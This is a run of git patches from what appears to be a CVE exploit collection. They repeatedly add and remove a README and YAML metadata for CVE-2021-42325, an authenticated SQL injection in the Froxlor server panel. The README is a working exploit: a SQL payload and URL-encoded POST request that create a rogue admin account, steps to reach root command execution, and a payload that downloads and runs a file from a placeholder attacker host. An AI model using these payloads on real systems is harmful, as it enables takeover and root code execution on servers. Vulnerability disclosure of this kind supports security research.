Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 0e4d86452245df00b929d9a7b2a5512129aa8720 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:51:41 +0000 Subject: [PATCH 19/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/.keep diff --git a/cve/Froxlor/2021/.keep b/cve/Froxlor/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From ed2ec2f15b349cc88169c52f9eba6a12500d88cc Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:17 +0000 Subject: [PATCH 20/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6155ae32cca85feeb4f3042a8d2b2a25c00ca148 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:44 +0000 Subject: [PATCH 21/31] add cve/Froxlor/2021/CVE-2021-42325/README.md. Signed-off-by: wangyue --- cve/Froxlor/2021/CVE-2021-42325/README.md | 89 +++++++++++++++++++++++ 1 file changed, 89 insertions(+) create mode 100644 cve/Froxlor/2021/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2021/CVE-2021-42325/README.md b/cve/Froxlor/2021/CVE-2021-42325/README.md new file mode 100644 index 00000000..3a4391d3 --- /dev/null +++ b/cve/Froxlor/2021/CVE-2021-42325/README.md @@ -0,0 +1,89 @@ +- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) +- Exploit Author: Martin Cernac +- Date: 2021-11-05 +- Vendor: Froxlor (https://froxlor.org/) +- Software Link: https://froxlor.org/download.php +- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 +- Patched Version: 0.10.30 +- Category: Web Application +- Tested on: Ubuntu +- CVE: 2021-42325 + + +### 1. Technical Description: +Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. + +#### 1.1 Pre-requisites + - Access to a customer account + - Ability to specify database name when creating a database + - Feature only availible from 0.10.28 onward and must be manually enabled + +### 2. Proof Of Concept (PoC): + +The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root +# +#### 2.1 Privilege Escalation + + - Sign into Froxlor as a customer + - View your databases + - Create a database + - Put your payload into the "User/Database name" field (if enabled) + - Application will error out however your SQL query will be executed + The following is a POST request example of running the payload provided, resulting in an administrator account being created + + +``` +POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 +Host: localhost +Content-Type: application/x-www-form-urlencoded +Content-Length: 448 +s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 + +``` + + +#### 2.2 Remote Code Execution + + To achieve RCE as root: + + - Sign into Froxlor as the newly created admin account (payload example creds are x:a) + - Go to System Settings + - Go to Webserver settings + - Adjust "Webserver reload command" field to a custom command + - The command must not contain any of the following special characters: ;|&><`$~? + - For details, see "safe_exec" function in lib/Froxlor/FileDir.php + - For example commands see Payloads 4.2 section + - Trigger configuration file rebuild + - Use menu item "Rebuild config files" + - Await a root cron job to execute your command + +### 3. Vulnerable resources and parameters + /customer_mysql.php (POST field: custom_suffix) + + +### 4. Payloads + +#### 4.1 SQL Injection payload + The following payload creates a new Froxlor admin with full access to all customers and the server configuration + The credentials are: + - username: x + - password: a + + `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- + + +#### 4.2 Remote Code Execution payload + Two part payload: + - wget http://attacker.com/malicious.txt -O /runme.php + - php /runme.php + +### 5. Timeline + 2021-10-11 Discovery + 2021-10-11 Contact with developer + 2021-10-11 Patch issued but no release rolled out + 2021-10-12 Reserved CVE-2021-42325 + 2021-11-05 Fix release rolled out + 2021-11-07 Public disclosure + +### 6. References: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 9a630d60635b55c671c70187a84606f40fa3a7b8 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:52:55 +0000 Subject: [PATCH 22/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/README.md | 89 -------------------------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2021/README.md diff --git a/cve/Froxlor/2021/README.md b/cve/Froxlor/2021/README.md deleted file mode 100644 index 3a4391d3..00000000 --- a/cve/Froxlor/2021/README.md +++ /dev/null @@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 -s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 5c13e6adacb318cfdd13e20814f282a41aa29d16 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 01:53:13 +0000 Subject: [PATCH 23/31] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 29f3c6a335370a7820601524ec9dae8f4aa6cae6 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:03 +0000 Subject: [PATCH 24/31] add cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 25 +++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cve/Froxlor/2021/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml new file mode 100644 index 00000000..f39d1ec1 --- /dev/null +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-42325 +source: + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 +info: + name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 + severity: high + description: + Froxlor是Froxlor团队的一套轻量级服务器管理软件。 + Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 + scope-of-influence: + Froxlor 0.9~0.10.30 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 + - https://avd.aliyun.com/detail?id=AVD-2021-42325 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - https://www.exploit-db.com/exploits/50502 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-42325 + cwe-id: CWE-89 + cnvd-id: None + kve-id: None + tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From 38620199407c4ce62a7b487d4659d311ec6e0d45 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:28 +0000 Subject: [PATCH 25/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/CVE-2021-42325?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/CVE-2021-42325/README.md | 89 ----------------------- 1 file changed, 89 deletions(-) delete mode 100644 cve/Froxlor/2023/CVE-2021-42325/README.md diff --git a/cve/Froxlor/2023/CVE-2021-42325/README.md b/cve/Froxlor/2023/CVE-2021-42325/README.md deleted file mode 100644 index c1b38e2e..00000000 --- a/cve/Froxlor/2023/CVE-2021-42325/README.md +++ /dev/null @@ -1,89 +0,0 @@ -- Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) -- Exploit Author: Martin Cernac -- Date: 2021-11-05 -- Vendor: Froxlor (https://froxlor.org/) -- Software Link: https://froxlor.org/download.php -- Affected Version: 0.10.28, 0.10.29, 0.10.29.1 -- Patched Version: 0.10.30 -- Category: Web Application -- Tested on: Ubuntu -- CVE: 2021-42325 - - -### 1. Technical Description: -Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. - -#### 1.1 Pre-requisites - - Access to a customer account - - Ability to specify database name when creating a database - - Feature only availible from 0.10.28 onward and must be manually enabled - -### 2. Proof Of Concept (PoC): - -The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root -# -#### 2.1 Privilege Escalation - - - Sign into Froxlor as a customer - - View your databases - - Create a database - - Put your payload into the "User/Database name" field (if enabled) - - Application will error out however your SQL query will be executed - The following is a POST request example of running the payload provided, resulting in an administrator account being created - - -``` -POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 -Host: localhost -Content-Type: application/x-www-form-urlencoded -Content-Length: 448 -s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 - -``` - - -#### 2.2 Remote Code Execution - - To achieve RCE as root: - - - Sign into Froxlor as the newly created admin account (payload example creds are x:a) - - Go to System Settings - - Go to Webserver settings - - Adjust "Webserver reload command" field to a custom command - - The command must not contain any of the following special characters: ;|&><`$~? - - For details, see "safe_exec" function in lib/Froxlor/FileDir.php - - For example commands see Payloads 4.2 section - - Trigger configuration file rebuild - - Use menu item "Rebuild config files" - - Await a root cron job to execute your command - -### 3. Vulnerable resources and parameters - /customer_mysql.php (POST field: custom_suffix) - - -### 4. Payloads - -#### 4.1 SQL Injection payload - The following payload creates a new Froxlor admin with full access to all customers and the server configuration - The credentials are: - - username: x - - password: a - - `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- - - -#### 4.2 Remote Code Execution payload - Two part payload: - - wget http://attacker.com/malicious.txt -O /runme.php - - php /runme.php - -### 5. Timeline - 2021-10-11 Discovery - 2021-10-11 Contact with developer - 2021-10-11 Patch issued but no release rolled out - 2021-10-12 Reserved CVE-2021-42325 - 2021-11-05 Fix release rolled out - 2021-11-07 Public disclosure - -### 6. References: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 \ No newline at end of file -- Gitee From 29d0af2b9bc9425f0843c818d66a573c445ddc4b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:44 +0000 Subject: [PATCH 26/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2023/yaml/CVE-2021-42325.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2023/yaml/CVE-2021-42325.yaml | 25 ----------------------- 1 file changed, 25 deletions(-) delete mode 100644 cve/Froxlor/2023/yaml/CVE-2021-42325.yaml diff --git a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml deleted file mode 100644 index f7274053..00000000 --- a/cve/Froxlor/2023/yaml/CVE-2021-42325.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2021-42325 -source: - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 -info: - name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 - severity: 高危 - description: | - Froxlor是Froxlor团队的一套轻量级服务器管理软件。 - Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 - scope-of-influence: - Froxlor 0.9~0.10.30 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-42325 - cwe-id: CWE-89 - cnvd-id: None - kve-id: None - tags: exploit, remote, code execution, sql injection \ No newline at end of file -- Gitee From c8307dabb65d32d98835b5958523f41aadd1055a Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:03:56 +0000 Subject: [PATCH 27/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/yaml/.keep diff --git a/cve/Froxlor/2021/yaml/.keep b/cve/Froxlor/2021/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 005ba167e48c5d895efb9edb3e42f0472269a4d2 Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:04:12 +0000 Subject: [PATCH 28/31] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/Froxlor/2021/CVE-2021-42325/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Froxlor/2021/CVE-2021-42325/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Froxlor/2021/CVE-2021-42325/.keep diff --git a/cve/Froxlor/2021/CVE-2021-42325/.keep b/cve/Froxlor/2021/CVE-2021-42325/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From d0dbf233586e0f427641682a6d7868e238f63c2b Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 02:07:42 +0000 Subject: [PATCH 29/31] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f39d1ec1..f25a97e3 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -12,8 +12,8 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 - - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 + - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html + - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H -- Gitee From 142e7b491b9fbc13cf8ee013e9dc587ed11abfdb Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:22:07 +0000 Subject: [PATCH 30/31] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index f25a97e3..1d02f52c 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/Froxlor/Froxlor/releases/tag/0.10.30 + https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high -- Gitee From a9a6557b5439298e6fe8f6d3848801ee342ed27d Mon Sep 17 00:00:00 2001 From: wangyue Date: Mon, 10 Apr 2023 03:26:24 +0000 Subject: [PATCH 31/31] update cve/Froxlor/2021/yaml/CVE-2021-42325.yaml. Signed-off-by: wangyue --- cve/Froxlor/2021/yaml/CVE-2021-42325.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 1d02f52c..7cd4ff5e 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,6 @@ id: CVE-2021-42325 source: - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42325.json + https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -14,7 +14,6 @@ info: - https://avd.aliyun.com/detail?id=AVD-2021-42325 - http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html - https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 - - https://www.exploit-db.com/exploits/50502 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 -- Gitee